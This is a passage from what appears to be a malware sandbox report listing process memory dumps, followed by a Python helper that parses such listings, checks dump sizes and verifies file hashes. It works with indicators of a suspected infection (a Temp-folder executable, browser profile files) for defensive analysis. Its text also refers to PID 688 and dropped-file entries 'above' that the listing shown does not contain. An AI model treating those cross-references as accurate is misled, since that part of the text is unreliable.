                    • memory/2888-661-0x0000000000F70000-0x0000000001230000-memory.dmp

                      Filesize

                      2.8MB

                    • memory/2888-606-0x0000000000F70000-0x0000000001230000-memory.dmp

                      Filesize

                      2.8MB

                    • memory/2888-603-0x0000000000F70000-0x0000000001230000-memory.dmp

                      Filesize

                      2.8MB

                    • memory/3248-767-0x000000013F090000-0x000000013F520000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/3248-768-0x000000013F090000-0x000000013F520000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/3248-832-0x000000013FC10000-0x00000001400A0000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/3248-807-0x000000013F090000-0x000000013F520000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/3248-805-0x000000013F090000-0x000000013F520000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/3248-855-0x000000013FC10000-0x00000001400A0000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/3284-798-0x0000000140000000-0x0000000140770000-memory.dmp

                      Filesize

                      7.4MB

                    • memory/3284-799-0x0000000140000000-0x0000000140770000-memory.dmp

                      Filesize

                      7.4MB

                    • memory/3284-771-0x0000000140000000-0x0000000140770000-memory.dmp

                      Filesize

                      7.4MB

                    • memory/3284-777-0x0000000140000000-0x0000000140770000-memory.dmp

                      Filesize

                      7.4MB

                    • memory/3284-796-0x0000000140000000-0x0000000140770000-memory.dmp

                      Filesize

                      7.4MB

                    • memory/3284-797-0x00000000000B0000-0x00000000000D0000-memory.dmp

                      Filesize

                      128KB

                    • memory/3284-776-0x0000000140000000-0x0000000140770000-memory.dmp

                      Filesize

                      7.4MB

                    • memory/3284-770-0x0000000140000000-0x0000000140770000-memory.dmp

                      Filesize

                      7.4MB

                    • memory/3284-775-0x0000000140000000-0x0000000140770000-memory.dmp

                      Filesize

                      7.4MB

                    • memory/3284-774-0x0000000140000000-0x0000000140770000-memory.dmp

                      Filesize

                      7.4MB

                    • memory/3284-773-0x0000000140000000-0x0000000140770000-memory.dmp

                      Filesize

                      7.4MB

                    • memory/3284-772-0x0000000140000000-0x0000000140770000-memory.dmp

                      Filesize

                      7.4MB

                    • memory/3320-785-0x000000001B700000-0x000000001B9E2000-memory.dmp

                      Filesize

                      2.9MB

                    • memory/3320-786-0x0000000002350000-0x0000000002358000-memory.dmp

                      Filesize

                      32KB

                    • memory/3372-806-0x0000000000400000-0x0000000000C7D000-memory.dmp

                      Filesize

                      8.5MB

                    • memory/3372-765-0x0000000000400000-0x0000000000C7D000-memory.dmp

                      Filesize

                      8.5MB

                    • memory/3372-680-0x0000000000400000-0x0000000000C7D000-memory.dmp

                      Filesize

                      8.5MB

                    • memory/3372-679-0x0000000000400000-0x0000000000C7D000-memory.dmp

                      Filesize

                      8.5MB

                    • memory/3372-675-0x0000000010000000-0x000000001001C000-memory.dmp

                      Filesize

                      112KB

                    • memory/3372-646-0x0000000000400000-0x0000000000C7D000-memory.dmp

                      Filesize

                      8.5MB

                    • memory/3372-816-0x0000000000400000-0x0000000000C7D000-memory.dmp

                      Filesize

                      8.5MB

                    • memory/3972-833-0x000000013FC10000-0x00000001400A0000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/3972-847-0x000000013FC10000-0x00000001400A0000-memory.dmp

                      Filesize

                      4.6MB

                    • memory/4056-853-0x000000001B780000-0x000000001BA62000-memory.dmp

                      Filesize

                      2.9MB
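The dropped-file and memory-dump entries above are a flat label/value listing, which is awkward to triage by eye once a process has many snapshots. The Python below is an added editor's example, not part of the sandbox report or of any tool it names: it parses that layout, checks that each memory dump's address range agrees with the reported Filesize, lists regions that were re-captured at several snapshot indices (as the 0x400000-0x457000 range of PID 688 is above), validates that every recorded digest has the right length and is hexadecimal, and recomputes digests over a byte string so a locally held copy can be compared with the recorded values. The sample input is copied from entries on this page; the 6% size tolerance is an assumption chosen to absorb the report's rounded sizes.

```python
import hashlib
import re
from collections import defaultdict

# Constructed sample input: a handful of entries copied from the report above,
# in the same flattened "bullet / label / value" layout the page uses.
SAMPLE_REPORT = r"""
• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\prefs.js
Filesize
6KB
MD5
15aae9924715792740651d1e26c8fd3f
SHA1
78b922a6e1fe7a0fa823c011e7ae34ec0765756a
SHA256
9f8a36ae03301c85070fa48cc21d814b56774f4629c5957c65647c02fe23aa7d
SHA512
41cf2801ac5cfd3a5fe31cd4d96d8dff3b214dc7d53945669cb82aca23228fc06edbe41209755437da880b95ca455f078988d2e5b5f263627bd9826ea041108c
• \Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
Filesize
3.1MB
MD5
ca0f8493d787c9f2d97d00c245143f41
SHA1
6ebb479b6c871e48ab97d2784b9e61fd2da1b55b
SHA256
9e3021c747f1c9b9bdd32194b75fdc724c7b8ab81af26dafcec2febef9f4b229
SHA512
74999928fc8a11b4963180e2647d93dad68d5f25388a1dde4e9aed94bf3e3cbca9710275ebfc0c468c9071c0f4f0302f73bfcf5c65d1b1334520ac68fed21fc3
• memory/688-169-0x0000000000400000-0x0000000000457000-memory.dmp
Filesize
348KB
• memory/688-180-0x0000000000400000-0x0000000000457000-memory.dmp
Filesize
348KB
• memory/3284-797-0x00000000000B0000-0x00000000000D0000-memory.dmp
Filesize
128KB
"""

LABELS = {"Filesize", "MD5", "SHA1", "SHA256", "SHA512"}
HASH_HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
SIZE_UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}
# Dump names follow "memory/<pid>-<snapshot index>-0x<start>-0x<end>-memory.dmp".
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9a-fA-F]+)-0x([0-9a-fA-F]+)-memory\.dmp$")
SIZE_TOLERANCE = 0.06  # assumption: the report rounds sizes (e.g. "3.1MB"), so allow 6%


def parse_entries(text):
    """Turn the bullet/label/value listing into a list of dicts keyed by label."""
    entries, current, pending = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):                      # new artifact
            current = {"name": line[1:].strip()}
            entries.append(current)
            pending = None
        elif line in LABELS:                          # label; value is on the next line
            pending = line
        elif current is not None and pending is not None:
            current[pending] = line
            pending = None
    return entries


def parse_size(text):
    """'348KB' -> 356352 bytes; '3.1MB' -> 3250585.6 bytes (the report rounds)."""
    m = re.fullmatch(r"([0-9.]+)\s*([KMG]?B)", text)
    if not m:
        raise ValueError(f"unrecognised size: {text!r}")
    return float(m.group(1)) * SIZE_UNITS[m.group(2)]


def check_memory_dumps(entries):
    """Group dumps by (pid, start, end) and flag dumps whose range disagrees with Filesize."""
    regions, mismatches = defaultdict(list), []
    for e in entries:
        m = MEM_RE.match(e["name"])
        if not m:
            continue
        pid, idx, start, end = int(m[1]), int(m[2]), int(m[3], 16), int(m[4], 16)
        reported = parse_size(e["Filesize"])
        if abs((end - start) - reported) > max(1024, SIZE_TOLERANCE * reported):
            mismatches.append((e["name"], end - start, reported))
        regions[(pid, start, end)].append(idx)
    return dict(regions), mismatches


def repeated_regions(regions):
    """Regions captured more than once: the sandbox re-dumped them as they changed."""
    return {k: v for k, v in regions.items() if len(v) > 1}


def check_hashes(entries):
    """Return (name, algo) pairs whose recorded digest is not hex of the expected length."""
    bad = []
    for e in entries:
        if MEM_RE.match(e["name"]):
            continue                                  # memory dumps carry no digests here
        for algo, n in HASH_HEX_LEN.items():
            v = e.get(algo, "")
            if len(v) != n or not re.fullmatch(r"[0-9a-fA-F]+", v):
                bad.append((e["name"], algo))
    return bad


def digests_match(data, entry):
    """Recompute each digest present in `entry` over `data`; True where it matches the record."""
    algos = {"MD5": hashlib.md5, "SHA1": hashlib.sha1, "SHA256": hashlib.sha256, "SHA512": hashlib.sha512}
    return {a: f(data).hexdigest() == entry[a].lower() for a, f in algos.items() if a in entry}


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE_REPORT)
    regs, bad_sizes = check_memory_dumps(parsed)
    print("entries:", len(parsed), "size mismatches:", bad_sizes, "bad digests:", check_hashes(parsed))
    for (pid, start, end), snaps in repeated_regions(regs).items():
        print(f"pid {pid} region 0x{start:X}-0x{end:X} dumped at snapshots {snaps}")
```

Run stand-alone it reports no size or digest inconsistencies for the sample and shows PID 688's 0x400000-0x457000 range captured twice. To compare a file you hold against the record, read it as bytes and pass it with the parsed entry to `digests_match`; any False tells you the local copy is not the artifact the sandbox saw.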
